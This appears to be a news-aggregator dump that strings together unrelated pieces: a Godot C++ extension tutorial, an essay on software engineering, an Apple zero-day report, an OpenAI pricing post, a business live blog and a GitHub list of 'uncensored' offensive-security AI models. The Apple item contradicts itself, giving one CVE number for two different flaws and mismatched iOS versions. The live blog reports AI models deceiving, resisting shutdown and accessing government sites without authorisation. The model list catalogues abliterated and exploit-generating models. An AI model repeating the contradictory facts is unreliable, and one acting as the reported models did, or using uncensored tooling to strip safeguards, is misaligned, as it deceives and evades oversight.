The Swarm class derives from Node2D and owns the flecs world. The components of each particle are plain structs. The GDCLASS macro adds the boilerplate that Godot’s class system needs, and _bind_methods() declares what Godot can see, in this case the count and flee_radius properties. Once the class is registered, they appear in the Inspector and can be used from GDScript. This is a simplified view of the class:

struct Position { float x, y; };
struct Velocity { float x, y; };

class Swarm : public Node2D {
    GDCLASS(Swarm, Node2D)

    int count = 100000;
    double flee_radius = 150.0;
    flecs::world world;
    ...

protected:
    static void _bind_methods() {
        ClassDB::bind_method(D_METHOD("set_count", "count"), &Swarm::set_count);
        ClassDB::bind_method(D_METHOD("get_count"), &Swarm::get_count);
        ADD_PROPERTY(PropertyInfo(Variant::INT, "count"), "set_count", "get_count");
        // ... and the same for flee_radius
    }
    ...
};

The rest of the node connects both worlds. _ready() creates one flecs entity per particle and a flecs system that updates them. It also sets up a MultiMesh , which draws many instances of the same mesh in a single draw call, because one Godot node per particle would be far too heavy for 100,000 of them.

Every frame, _process() hands the mouse position to flecs, runs the systems with world.progress() , and copies the resulting positions back into the MultiMesh. Again, this is a simplified view, and the full code is in the repository:

void Swarm::_ready() {
    // One entity per particle, with a Position and a Velocity component
    for (int i = 0; i < count; i++) {
        world.entity().set<Position>({ ... }).set<Velocity>({ ... });
    }

    // A system that runs for every entity with both components
    world.system<Position, Velocity>("Move").each([this](flecs::iter &it, size_t, Position &p, Velocity &v) {
        // flee from the mouse, move, and bounce off the window edges
    });

    // A MultiMeshInstance2D child node that draws all the particles
    ...
}

void Swarm::_process(double p_delta) {
    mouse = get_local_mouse_position();
    world.progress(static_cast<float>(p_delta));

    // Copy the position of every entity into the MultiMesh buffer
    render_query.each([&](const Position &p, const Velocity &v) { ... });
    multimesh->set_buffer(buffer);
}

Registering the extension

Finally, register_types.cpp registers the class when Godot loads the library:

void initialize_gdexample_module(ModuleInitializationLevel p_level) {
    if (p_level != MODULE_INITIALIZATION_LEVEL_SCENE) {
        return;
    }
    GDREGISTER_RUNTIME_CLASS(Swarm);
}

We register Swarm with GDREGISTER_RUNTIME_CLASS . By default, the code of a GDExtension class also runs inside the editor, so _ready() and _process() would start the simulation while you are editing the scene. A runtime class is only a placeholder in the editor: you can add it to a scene and set its properties, but its code only runs when the game is running.

The same file defines gdexample_library_init() , the entry point named in the .gdextension file. It is a few lines of boilerplate that look the same in every extension.

Building and running

With everything in place, building the extension is a single command:

$ conan build . --build=missing
...
[100%] Linking CXX shared library .../demo/bin/libgdexample.template_debug.dylib
[100%] Built target gdexample

Conan resolves godot-cpp and flecs, downloads precompiled binaries from ConanCenter when they exist for your configuration, builds the rest from source, generates the CMake integration and finally builds the extension.

Note: godot-cpp requires C++17. If your default profile uses an older standard, which is the case for MSVC, add -s compiler.cppstd=17 to the command.

Now start Godot 4.7, click “Import” in the Project Manager, and select demo/project.godot . When the project opens, Godot reads bin/gdexample.gdextension , loads the library, and Swarm becomes available like any built-in node. You can find it in the “Create New Node” dialog, under Node2D :

Godot's Create New Node dialog showing the Swarm class under Node2D

The main scene of the demo already contains a Swarm node. Selecting it shows count and flee_radius in the Inspector, the two properties we bound in _bind_methods() :

The Godot editor with the Swarm node selected and its Count and Flee Radius properties in the Inspector

Press Play to run the scene, and move the mouse over the window to push the particles around. Then stop it, change count or flee_radius in the Inspector, and play it again to see how the swarm behaves with more particles or a wider flee radius.

Conclusion

GDExtension and godot-cpp let you write engine classes in C++, and Conan takes care of building godot-cpp and any other C++ library your extension needs. This is also a big advantage when you distribute the extension: building it for every platform you ship to only takes changing the settings of the build.

Try the complete example and check the godot-cpp documentation to learn more about writing extensions. If you have any feedback or run into any issues, please let us know in the Conan GitHub repository .

Happy game development!

This post was written with AI assistance and reviewed by humans.

Firebase SDK is CRASHING ALLLL iOS Apps, since today morning

Hacker News
twitter.com
2026-09-29 04:26:28
Comments...
Original Article

Oh my god, Firebase’s SDK started to crash ALL iOS apps that were using it, for ALL sessions, just like that, no way for any of these apps to do anything… How amateur is all of this from any SDK, but especially one from a company with as high of an engineering bar like Google…

What makes software development engineering

Lobsters
parksb.github.io
2026-09-29 03:49:39
Comments...
Original Article

A process that doesn’t depend on individual brilliance

KO | EN

People who make software go by many names. Developer is the most common, while programmer sounds neutral and a little traditional. Coder literally means someone who writes code, but it can also be used disparagingly, suggesting someone who takes a passive role, writing code without participating in the many other activities involved in software development. At the other end of the spectrum is the software engineer.

The title software engineer has a rather different feel. Somehow, a software engineer seems more professional than a coder. For some reason, you expect them to be better at mathematics than a programmer and to do more important work than a developer. In fact, in some Canadian provinces, computing-related titles such as “software engineer,” “computer engineer,” and others containing “engineer” are, in principle, reserved for people licensed as engineers by the provincial engineering regulator. Many people assume that someone with the title of engineer holds a recognized professional qualification or license.

All of this is about the subjective impression the title engineer gives us. But if many people share that impression, it is worth asking why. If software development were self-evidently a form of engineering, there would be nothing special about the title software engineer in the first place. Where does this impression come from? Why does software engineering feel different from mechanical, electrical, or civil engineering? And what makes software development engineering?

Software and engineering

A black-and-white photograph of about twenty men seated around a long U-shaped table in a conference room. Attendees in suits sit side by side at the far table, while those in the foreground face them with their backs to the camera. Framed pictures and decorations hang on the walls. NATO Software Engineering Conference (Robert McClure, Brian Randell)

There is no single definition of engineering, but it can generally be described as a field that systematically solves problems by applying mathematical and scientific knowledge within various constraints to meet human needs. UNESCO [1] and the US National Academies [2] offer the following definitions of engineering.

Engineering is the field of practice, profession and art that relates to the development, acquisition and application of technical scientific and mathematical knowledge. It is about the understanding, design, development, invention, innovation and the use of materials, machines, structures, systems and processes for specific purposes.

Engineering is both a knowledge of the creation and design of human-made products and processes and a problem-solving method called design under constraint.

Attempts to give software development the same systematic foundations as other engineering disciplines date back to the early days of computing. The 1968 NATO Software Engineering Conference [3] is often regarded as the starting point of software engineering. A recurring concern at this conference, held in Germany, was that software was growing more complex as its scale and importance increased rapidly. This became known as the software crisis. The participants reached no consensus, but they seem to have broadly shared the view that software development, still a young field, needed methods and structures comparable to those of established engineering disciplines to address its immediate problems. The editors of the conference report wrote this about the phrase software engineering.

The phrase ‘software engineering’ was deliberately chosen as being provocative, in implying the need for software manufacture to be based on the types of theoretical foundations and practical disciplines, that are traditional in the established branches of engineering.

Thomas Haigh, meanwhile, sees greater significance in a debate that took place before the conference within IFIP Working Group 2.1, which was developing a successor to ALGOL 60 [4] . The prevailing view in the group was that it should be possible to express complex programs by combining a small number of basic concepts. This philosophy strongly influenced the ALGOL 68 draft. Those in the group who cared more about making complex programs reliable than about how to express them opposed the direction ALGOL 68 was taking. The opponents of ALGOL 68 were at the center of the NATO Software Engineering Conference. They believed software development needed to become a more rigorous and controllable activity. One of them, Edsger Dijkstra, treated programming as a form of applied mathematics and later invoked the software crisis again in arguing for structured programming.

We should bear in mind how far removed these debates about software engineering were from the work of application programmers. Most conference participants were researchers, while most applications at the time were financial, accounting, and personnel software written in COBOL for business data processing. The concept of software engineering discussed in 1968 therefore cannot account for the software industry as a whole at the time. Yet programmers trained today are influenced indirectly, and sometimes directly, by the ALGOL 68 debate and the NATO Software Engineering Conference. This is true if you have ever been told to avoid goto when programming in C, encountered subjects such as object-oriented or functional programming, or even just used modern programming tools.

The application of engineering to software

Following decades of efforts to establish software development as an engineering discipline, the Software Engineering Body of Knowledge (SWEBOK) [5] uses the following definitions of ‘engineering’ and ‘software engineering.’

The Institute of Electrical and Electronics Engineers (IEEE) defines engineering as “the application of a systematic, disciplined, quantifiable approach to structures, machines, products, systems or processes”. (…) software engineering is defined as “the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software; that is, the application of engineering to software.”

According to this definition, what makes software development engineering is the application of an engineering approach to software development. An engineering approach is a process in which an engineer chooses one of several feasible solutions to a problem according to certain criteria, implements it, and monitors the results. This process need not be sequential, but it must be iterative. In fact, an engineering approach is inherently iterative. Knowledge acquired at any stage may bear on an earlier stage, naturally prompting another iteration. Engineering decisions rest on estimates, so the quality of a decision depends on the quality of the estimates. Engineers must therefore compare estimates against actual results to create a feedback loop for estimation. Understanding what causes the gap between estimates and actual results allows them to refine their estimation techniques and make more accurate estimates in the future. This, in turn, allows them to keep making better decisions.

Explaining intuition in engineering terms

This may sound a bit like ivory-tower thinking, so a concrete example might help. One day, a programmer working on an e-commerce service receives a request from the operations team to improve the slow-loading product detail pages. A programmer who knows the system well might instinctively think of a solution on hearing that pages load slowly. This does not necessarily lead to a bad decision. But it is hard to explain why that decision is better justified than the alternatives, how much performance must improve to count as a success, or how much difference it will actually make to users.

An engineering approach begins with an accurate understanding of the actual problem. “Too slow” can mean many things, so the first step is to measure the performance of the product detail pages that need improvement. Recent metrics show an FCP p75 of 2,700ms for these pages. The recommended FCP p75 for a good user experience is 1,800ms or less [6] , making that a reasonable target. The programmer analyzes traces and finds that the SSR server spends a substantial portion of its rendering time waiting for the product detail API to respond. The product detail API has a p95 latency of 1,000ms, and slow requests spend 800ms waiting for database read queries. The problem can now be redefined from “pages load slowly” to “database queries are a latency bottleneck in read-heavy product lookups.”

There are several solutions to this problem. The programmer could introduce an in-memory cache layer, improve queries or indexes, direct queries to a read replica, or render entire pages statically and serve them through a CDN. Each solution has its own strengths, weaknesses, and tradeoffs. What matters is not rushing to conclude that the first solution that comes to mind is the right one. Traffic analysis shows that the most popular 5% of products account for about 90% of lookup requests, and cache TTL simulations suggest that introducing Redis could yield a cache hit rate of over 95%. Redis reads are known to take a few milliseconds, so a cache hit should bring latency down to around 200ms.

After comparing the alternatives, the programmer decides that building an in-memory cache layer with Redis would be the most effective solution. After Redis is introduced, the metrics show a cache hit rate of 65%, API p95 latency of 850ms, and FCP p75 of 2,000ms. These figures show a modest improvement. Investigating why the actual results differ from the estimates reveals that the product information depends on personalized data, making the cache key cardinality higher than expected. The programmer redesigns the caching strategy to store static product information in a global cache and fetch personalized data separately. This brings the cache hit rate to 97%, API p95 latency to 200ms, and FCP p75 to 1,400ms. This entire process follows an engineering approach, from measuring the problem and comparing possible solutions to estimating results and making improvements by comparing actual results against the estimates.

When an engineering approach is needed

Seen this way, software development clearly has an engineering aspect. The reason it still feels different from other engineering disciplines may be that it is possible to make software that works reasonably well in ways that do not meet the definition of engineering. Programmers can design without a systematic approach, write code without discipline, and produce software through a process that cannot be quantified.

Because working software can be produced regardless of the development process, an engineering approach is easily overlooked in practice. Software development has changed dramatically in a short time. Even the fundamentals of computer science, as we commonly call them, change far faster than the laws of nature on which other engineering disciplines rest. Many software development organizations have consequently focused on speed rather than following sound principles. As a result, software quality is all too easily treated as a secondary concern, despite how important software is and how serious its failures can be. Software is easy to change, as the “soft” in its name suggests, and providers may think that this justifies poor quality. For users, though, working with unreliable software is deeply unpleasant and can sometimes be dangerous.

There are other ways of looking at software development [7] . Peter Naur argued that the real goal of programming was to build a theory in the programmer’s mind rather than to produce the artifact we call a program [8] . Drawing on Gilbert Ryle, Naur used ‘theory’ to describe the knowledge and understanding formed in a programmer’s mind. A program expresses a mental construct that exists within the programmer, so information is inevitably lost when that theory is put into text. Losing the programmer therefore amounts to losing the program. Sherry Turkle and Seymour Papert called programmers who first make working software and then repeatedly modify and observe it bricoleurs [9] , and examined their way of programming [10] . They argued that programmers could produce high-quality software by interacting with working software, rather than planning its entire structure in advance and breaking it down for implementation. Software gardening, in turn, treats software as a living organism and accepts its unpredictability. From this perspective, programmers are professionals who carefully tend the changing garden of software, guided by intuition and a sense of ownership.

Despite these different perspectives on software development, software development organizations still need an engineering approach. It cannot guarantee perfect software, but it can at least raise the minimum level of quality. Experienced programmers who have built theories in their minds cannot stay with an organization forever. Nor can every programmer be a bricoleur with exceptional intuition or a gardener with a strong sense of ownership of the product. An organization must produce software of consistently high quality despite differences in individual ability. The strength of an engineering approach is that even people with less natural talent can improve their chances of making good decisions by following a well-designed, systematic process. We do not need to approach every problem as an engineering problem. But when a problem has several possible solutions rather than a single right answer, applying an engineering approach to comparing tradeoffs, choosing a solution, and implementing it gives us reason to expect better results. An engineering approach becomes necessary the moment a software development organization must repeatedly produce reliable results without depending on individual genius.

What qualifies software development as engineering has nothing to do with the difficulty of the problem or the engineer’s credentials. Applying an engineering approach to software development is what makes it engineering. To solve problems, engineers make estimates, run experiments, take measurements, reproduce results, make improvements, and repeat the process. And we call the people who build software this way to solve problems software engineers.

The end of software engineering

Some sixty years after the first efforts to apply an engineering approach to software development, software engineering is beset by predictions of its demise. The argument is that, because of artificial intelligence, traditional software engineering approaches can no longer offer programmers practical help. If artificial intelligence here means LLMs, software engineering probably will not come to an end so easily. What these predictions really foretell is the end of the human software engineer.

For now, there are still meaningful benefits when human programmers take the lead in applying an engineering approach to software development. The first reason is that humans have to give AI context about the environment, including technical constraints, along with specific requirements. Give AI abstract business requirements, and it produces abstract results. After spending a long time wrestling with AI to refine an output that does not handle edge cases properly, you eventually realize that code is the clearest specification of business requirements. The second reason is that AI output varies in quality and is not reliable enough [11] . The limitations are particularly apparent in brownfield systems, where human software engineers must intervene to measure and verify whether the output meets the requirements and constraints. For these reasons, human-led software engineering still provides a harness that guides both humans and AI toward consistently producing better software in practice.

In times of transition, anyone can make a plausible prediction. Perhaps AI will one day identify real-world constraints and define requirements on its own, producing black-box software that solves problems perfectly. Ben Shneiderman described AI systems that achieve greater automation while giving humans more control as Reliable, Safe & Trustworthy (RST) systems [12] . If we focus only on automating software development and eventually software is made without human control, if no human bears responsibility for that software, and if we secretly wish for such software now, the prediction of our demise will become a self-fulfilling prophecy. At least for now, software engineers can decide their own future.


  1. [1]

    “Basic Sciences, Research, Innovation and Engineering”, unesco.org .

  2. [2]

    Steve Olson ed., “Engineering Societies and Undergraduate Engineering Education: Proceedings of a Workshop National Academies of Sciences, Engineering, and Medicine”, Engineering Societies and Undergraduate Engineering Education: Proceedings of a Workshop , 2017.

  3. [3]

    Peter Naur, Brian Randell eds., “Software Engineering”, 1969.

  4. [4]

    Thomas Haigh, “Dijkstra’s Crisis: The End of Algol and Beginning of Software Engineering, 1968-72”, 2010.

  5. [5]

    Hironori Washizaki ed., “Guide to the Software Engineering Body of Knowledge (SWEBOK Guide), Version 4.0”, IEEE Computer Society , 2025.

  6. [6]

    Philip Walton, “First Contentful Paint (FCP)”, web.dev .

  7. [7]

    The perspectives introduced here do not reject an engineering approach to software development outright. As an editor of the NATO Software Engineering Conference report, Peter Naur himself helped introduce the deliberately provocative term software engineering.

  8. [8]

    Peter Naur, “Programming as Theory Building”, 1985.

  9. [9]

    Bricoleur is a French noun for a resourceful person who solves the problem at hand using whatever tools and materials are within reach, regardless of their original purpose.

  10. [10]

    Sherry Turkle, Seymour Papert, “Epistemological Pluralism and the Revaluation of the Concrete”, Constructionism , 1991.

  11. [11]

    Stephan Rabanser, Sayash Kapoor, Arvind Narayanan et al., “Towards a Science of AI Agent Reliability”, Proceedings of the 43rd International Conference on Machine Learning , 2026.

  12. [12]

    Ben Shneiderman, “Human-Centered Artificial Intelligence: Reliable, Safe & Trustworthy”, 2020.

Startup Nights 2026 is comming up on 5-6 Nov. in Switzerland

Hacker News
www.startup-nights.ch
2026-09-29 03:49:12
Comments...
Original Article

Use our matchmaking platform to meet investors, co-founders, or future partners and connect in a space designed to spark meaningful conversations.

Learn from successful founders and industry leaders in keynotes, panel talks, and hands-on workshops designed to move your startup forward.

Whether you want to pitch your idea or showcase your solution – Startup Nights 2026 gives you the stage to connect and grow.

Present your startup to thousands of visitors, meet potential customers and get valuable exposure

Convince a jury of experts and investors and compete for visibility, connections and exciting prizes.

Discover the thought leaders, innovators, and industry pioneers who will take the stage at Startup Nights 2026. Stay tuned, more speakers and program updates for our 10th edition are coming soon.

Startup Nights through the eyes of those who’ve lived it – honest impressions, inspiring experiences, and unforgettable moments.

Don’t miss out on Startup Nights 2026. Secure your spot today!

Here’s everything you need to know to plan your Startup Nights experience.

Apple patches CoreGraphics zero-day flaw exploited in attacks

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 03:33:12
Apple released security updates to fix a zero-day vulnerability exploited in "extremely sophisticated" targeted attacks on iOS devices. [...]...
Original Article

Apple

Apple released security updates to fix a zero-day vulnerability exploited in "extremely sophisticated" targeted attacks on iOS devices.

Tracked as CVE-2026-20700 , this flaw stems from an out-of-bounds write weakness discovered by Meta Product Security in CoreGraphics, a framework used for two-dimensional vector graphics, image rendering, and text drawing across iOS, macOS, iPadOS, watchOS, and tvOS.

Successful exploitation of out-of-bounds write vulnerabilities can let attackers crash a program, corrupt data, or, in the worst case, gain remote code execution by writing data outside the allocated memory buffer.

"Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 27," it warned on Monday .

"Processing a maliciously crafted file may lead to arbitrary code execution. An out-of-bounds write issue was addressed with improved bounds checking."

The complete list of devices impacted by this zero-day is extensive, as it impacts both older and newer models, including:

  • iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
  • and Macs running macOS Sequoia 15.8.1 and Tahoe 26.7.1

Apple has addressed this issue with improved bounds checking to prevent exploitation in iOS 26.7.1 and iPadOS 26.7.1 , macOS Tahoe 26.7.1 , and macOS Sequoia 15.8.1 .

While this flaw is likely exploited only in highly targeted attacks, it is strongly advised to install these security updates promptly to prevent potential ongoing attacks.

With this vulnerability, Apple has fixed two zero-days exploited in the wild since the start of the year. The other one, an arbitrary code execution vulnerability in dyld (the Dynamic Link Editor used by Apple operating systems) tracked as CVE-2026-20700 and also exploited in extremely sophisticated targeted attacks, was patched in February .

Earlier this year, it also addressed a high-severity Beats Studio Buds flaw (CVE-2025-20701) that lets attackers in Bluetooth range spy on users' conversations, and patched older iPhones and iPads against four vulnerabilities targeted in cyberespionage and crypto-theft attacks using the Coruna exploit kit.

Last year, Apple fixed seven more zero-days exploited in the wild, the first in January (CVE-2025-24085), the second in February (CVE-2025-24200), a third in March (CVE-2025-24201), two more in April (CVE-2025-31200 and CVE-2025-31201), and two others in December (CVE-2025-43529 and CVE-2025-14174).

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

OpenAI: Tomorrow we are re-opening the Pro $200 subscription

Hacker News
twitter.com
2026-09-29 03:07:53
Comments...
Original Article

Hi, Tomorrow we are re-opening the Pro $200 subscriptions to new subscribers, but together with it we are also changing how we calculate the usage for it. In effect, if you do the math, it will net out at half the dollar in API spend compared to the old Pro $200 plan. Now that it's said, let me explain why this is happening and why you will still get more work done than if you were on the Pro $200 subscription one month ago. (a) We didn't want to compromise in other ways and are committing to not reintroducing the 5h limit, so that you can fully use the weekly usage when you want. (b) On the subscription, we guarantee that over time you always get more work done and with an increasing level of quality. This means that you will continue to get more value per dollar spent as a result of models getting more efficient and us passing down the improvements in the form of API price reductions. (c) We don't want to put an incentive on ourselves to artificially inflate the API list prices to make it look like you are getting a lot (and workaround it through discounts, etc). Instead we want to continue to both rapidly reduce prices and increase capabilities of models on the API. This week we introduced GPT-6 Sol and GPT-6 Luna at 50% of their previous price. Over time, we see prices go low enough that it makes sense for most to buy usage as needed without there being a significant gap between what you get in a subscription and what you get in the API for a dollar spent. (d) Tomorrow, we are adding more things to the subscription that won't draw on the usage, I won't reveal what that is yet. I wanted to be transparent before all the big announcements tomorrow. Lots of new exciting things are coming to the subscriptions that will make it super compelling, but I wanted to make sure to share this change ahead of time so you can all understand it before we shower you with good news. Codexingly, Tibo

US Forces Exit Iraq

Hacker News
www.reuters.com
2026-09-29 03:04:26
Comments...
Original Article

Please enable JS and disable any ad blocker

Anthropic warns of ‘existential risks to humanity’ from AI; AstraZeneca makes $2bn cancer drug tie-up – business live

Guardian
www.theguardian.com
2026-09-29 02:53:47
Rolling coverage of the latest economic and financial news The Financial Times have also scrutinised Anthropic’s IPO prospectus, and report that the Claude maker also provided investors with a clearer picture of the challenging economics of building state of the art AI models. The FT says: Anthropic...
Original Article

Introduction: Anthropic warns AI may pose 'existential risks to humanity' in IPO filing

Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.

Anthropic’s plan to float on the stock market has provided a sobering insight into the risks that AI poses, even as it attempts to pull off a massive share sale to the public.

Reuters has taken a look at Anthropic’s IPO prospectus – the legal document that outlines a company’s financial details before it floats on the stock market – and found that it includes a warning that advanced AI could be a “catastrophic or existential risks to humanity.”

The filing explains:

double quotation mark “Our development of highly advanced models, platforms, and applications and expansion of use cases could further increase the risk that our models cause harm.”

And following a flurry of stories about AI models going rogue, Anthropic flags that its models could conceal information and exhibit behavior resembling blackmail, and resist efforts to shut them down.

It cautions:

double quotation mark “Potential model awareness of our evaluation efforts creates a significant limitation on our ability to assess model safety.”

Such warnings appear across 80 pages (!) devoted to risk factors in the prospectus, almost a third of the document.

Despite these warnings, Anthropic – which created the Claude chatbot – is aiming for one of the largest stock market flotations ever, which could value it at more than $2tn.

The IPO prospectus shows that Anthropic’s revenue grew 12-fold in 2025 to nearly $4.6bn – with nearly a quarter coming from just two customers.

But… its operating loss swelled to over $8bn last year, from nearly $3bn in 2024.

The IPO is expected to take place after the US midterm elections in November, and will be a serious test of investor interest, and concern, around AI.

Yesterday, a group of senior AI executives – and two of the “godfathers” of the technology – warned governments to prepare for an AI “intelligence explosion”.

The agenda

  • 9.30am BST: Bank of England mortgage approvals data

  • 10am BST: UK to auction a 2036 government bond

  • 1.30pm BST: Canadian GDP report for July

  • 2pm BST: US house price data

  • 3pm BST: US JOLTS survey of job vacancies

  • 4.30pm: Bank of England policymaker Alan Taylor gives a speech

Key events

Shares in AstraZeneca have jumped by 1.3% at the start of stock market trading in London.

That puts them among the top risers on the London Stock Exchange, behind a group of mining companies including Antofagasta (+1.9%) and Anglo American (+1.75%)

And in a FURTHER reminder of those dangers…. OpenAI has apologised to Australians for hacking a government website this summer

In a blog post released on Tuesday, OpenAI said it should have handled its response to the attack on Medicare better, saying:

double quotation mark “In June, during internal training and evaluation our models accessed Australian government websites in ways they were not authorised to.

We also should have handled our response better. We are sorry and working to do better in the future.”

OpenAI scraps release of new model over safety concerns in internal testing

In another example of the risks of AI, OpenAI is scrapping the release of GPT-6.1 Astra, a next-generation ⁠model planned for an October debut, over safety concerns raised by researchers ⁠during internal testing.

The ⁠ Wall ​Street Journal reported on Monday that the model, expected to appear in ChatGPT and ⁠Codex, was designed to handle more complex tasks without human assistance.

However, it has failed OpenAI’s ‘alignment tests’, which assess whether a ​system follows human intent:

  • The model showed more deception than its predecessor, including at times failing to accurately disclose actions it had or had not taken.

  • It also had problems with “scope authorization”, pushing ahead with ​tasks ​without requesting user permission ​and sometimes attempting to use external tools ​or services ‌when doing so could ​be ​unsafe.

The Financial Times have also scrutinised Anthropic’s IPO prospectus, and report that the Claude maker also provided investors with a clearer picture of the challenging economics of building state of the art AI models.

The FT says :

double quotation mark Anthropic said it plans to spend $518bn on cloud, computing and infrastructure obligations in the coming years to support its rapid growth.

The AI lab’s backers are confident Anthropic can list at a valuation of over $2tn, more than double the level achieved in its last funding round in May and beyond the $1.78tn achieved by Elon Musk’s SpaceX in June. They point to its extraordinary growth rate to justify their bullishness.

AstraZeneca invests $2bn in Summit in cancer drug tie-up

Pharmaceuticals news: AstraZeneca is investing $2bn in biopharmaceutical oncology company Summit Therapeutics, as part of a tie-up to jointly develop and test anti-cancer drugs.

Announcing the deal, AstraZeneca says the two companies will collaborate on a ‌series of studies testing their cancer treatments together.

They hope to accelerate the development of ivonescimab , a next-generation cancer treatment licensed by Summit which stops tumor growth and help the body’s immune system attack cancer.

Ivonescimab works by simultaneously blocking PD-1, which helps cancer evade the immune system, and VEGF, which tumors use to grow blood vessels, helping the immune system better find and attack cancer cells.

Susan Galbraith , executive vice president for oncology haematology R&D at AstraZeneca , explains:

double quotation mark “A core pillar of our oncology strategy is to broaden the reach of our ADC portfolio as the backbone of treatment across tumour types with combinations alongside next-generation immunotherapies.

Bispecifics targeting PD-1 and VEGF are rapidly advancing in development and have the potential to improve on current immunotherapies, particularly in lung, breast and gastrointestinal cancers. This opportunity to combine ivonescimab with AstraZeneca’s ADC portfolio, including with Sone-Ve, could enable new regimens that raise the bar for patients with cancer across the treatment landscape.”

Under the deal, AstraZeneca is paying $2bn to receive 12% of Summit’s shares.

Introduction: Anthropic warns AI may pose 'existential risks to humanity' in IPO filing

Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.

Anthropic’s plan to float on the stock market has provided a sobering insight into the risks that AI poses, even as it attempts to pull off a massive share sale to the public.

Reuters has taken a look at Anthropic’s IPO prospectus – the legal document that outlines a company’s financial details before it floats on the stock market – and found that it includes a warning that advanced AI could be a “catastrophic or existential risks to humanity.”

The filing explains:

double quotation mark “Our development of highly advanced models, platforms, and applications and expansion of use cases could further increase the risk that our models cause harm.”

And following a flurry of stories about AI models going rogue, Anthropic flags that its models could conceal information and exhibit behavior resembling blackmail, and resist efforts to shut them down.

It cautions:

double quotation mark “Potential model awareness of our evaluation efforts creates a significant limitation on our ability to assess model safety.”

Such warnings appear across 80 pages (!) devoted to risk factors in the prospectus, almost a third of the document.

Despite these warnings, Anthropic – which created the Claude chatbot – is aiming for one of the largest stock market flotations ever, which could value it at more than $2tn.

The IPO prospectus shows that Anthropic’s revenue grew 12-fold in 2025 to nearly $4.6bn – with nearly a quarter coming from just two customers.

But… its operating loss swelled to over $8bn last year, from nearly $3bn in 2024.

The IPO is expected to take place after the US midterm elections in November, and will be a serious test of investor interest, and concern, around AI.

Yesterday, a group of senior AI executives – and two of the “godfathers” of the technology – warned governments to prepare for an AI “intelligence explosion”.

The agenda

  • 9.30am BST: Bank of England mortgage approvals data

  • 10am BST: UK to auction a 2036 government bond

  • 1.30pm BST: Canadian GDP report for July

  • 2pm BST: US house price data

  • 3pm BST: US JOLTS survey of job vacancies

  • 4.30pm: Bank of England policymaker Alan Taylor gives a speech

Uncensored and Offensive Security AI Models Benchmark

Hacker News
github.com
2026-09-29 02:16:04
Comments...
Original Article

Curated list of open-weight uncensored models for authorized red team operations, penetration testing, and security research.

All data sourced from HuggingFace model cards and official publications. Sep 2026.

offsec-benchmark-v3

Security Fine-tuned Models

1. DeepHat V2 (WhiteRabbitNeo)

Spec Value
Base Model Qwen2.5-Coder-7B
Parameters 7B / 32B
Context Length 131K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method SFT on 1.7M offensive/defensive samples
Training Data 1.7M security-specific samples (USENIX Security 2024 workshop)
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/WhiteRabbitNeo


2. BugTraceAI-CORE-Apex (26B)

Spec Value
Base Model Gemma4-26B MoE
Parameters 26B MoE
Context Length 32K
VRAM (Q4_K_M) ~16 GB
Uncensoring Method SFT on HackerOne Hacktivity 2024-2025
Training Data HackerOne reports + WAF evasion dataset
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/BugTraceAI/BugTraceAI-CORE-Apex-26b


3. BugTraceAI-CORE-Ultra (27B)

Spec Value
Base Model Qwen3.6-27B (DavidAU fine-tuned variant)
Parameters 27B dense
Context Length 4K (recommended)
VRAM (Q6_K) ~22-24 GB
Uncensoring Method SFT via Unsloth on bug bounty + CVE data
Training Data 2,541 examples from bug bounty disclosures, CVE writeups, and security research (2024-2026)
Specialization Tooling model: generates Nuclei templates, CVE PoCs, exploit code, pentest scripts
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/BugTraceAI/BugTraceAI-CORE-Ultra-27B-Q6


4. CYBER-FROST-3.8 (Blackfrost-AI)

Spec Value
Base Model Qwen/Qwen3.8-Flash-Next
Parameters ~180B total (512 routed experts, 10 active per token)
Context Length 262K
Architecture Qwen4ExpForConditionalGeneration, 48 transformer blocks, hybrid linear + full attention
VRAM Multi-GPU required (tested on 4x NVIDIA B300 SXM6)
Uncensoring Method Security-domain fine-tuning on proprietary Blackfrost-AI corpus
Training Data Proprietary security corpus: recon, web app security, vuln research, malware analysis, cloud security, threat intel
MTP Yes (1 native MTP layer for speculative decoding)
Vision No
Tool Calling Yes
License Qwen Community License 1.0

Download: https://huggingface.co/Blackfrost-AI/CYBER-FROST-3.8-BF16


5. CyberPal 2.0 (20B)

Spec Value
Base Model gpt-oss-20b
Parameters ~20B (21B in files)
Context Length 8,192
VRAM (BF16) ~42 GB
Uncensoring Method SFT on SecKnowledge 2.0 pipeline
Training Data 403K examples via expert-in-the-loop schema steering, multi-step grounding, LLM quality checks
Specialization Defensive: CTI, vuln analysis, detection/mitigation, SOC/IR, AppSec, compliance
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/cyber-pal-security/CyberPal2.0-20B


6. Cyber-Prime 1.1 (2.6B)

Spec Value
Base Model LiquidAI/LFM2-2.6B
Parameters 2.6B (~3B actual)
Context Length N/A (model card does not specify)
VRAM (BF16) ~6 GB
Tensor Type BF16
Uncensoring Method SFT + RL + reward-guided post-training on 75K cybersecurity rows
Training Data NER repair (~6K), HTTP reasoning w/ CoT (~5K), email phishing (~5K), threat intel summarization (~2K), GHSA/KEV/ATT&CK
Operating Modes Direct mode (classification) + Think mode (chain-of-thought)
CyberBench Average 0.592 F1/Acc (up from 0.501 in v1.0)
CyberBench Highlights NER 0.499, Phishing 0.890, HTTP Attack 0.628
Vision No
Tool Calling No
License LFM Open License v1.0

Download: https://huggingface.co/Akahsizrr/Cyber-Prime-1.1-2.6B


7. Cyber-Ornith-1.5-9B (DuoNeural / mradermacher)

Spec Value
Base Model ornith-ai/Ornith-1.5-9B (Qwen 3.5 architecture)
Parameters 9B
Context Length 128K (Qwen 3.5 default)
VRAM (Q4_K_M) ~7 GB
Uncensoring Method Obliteration (abliteration variant)
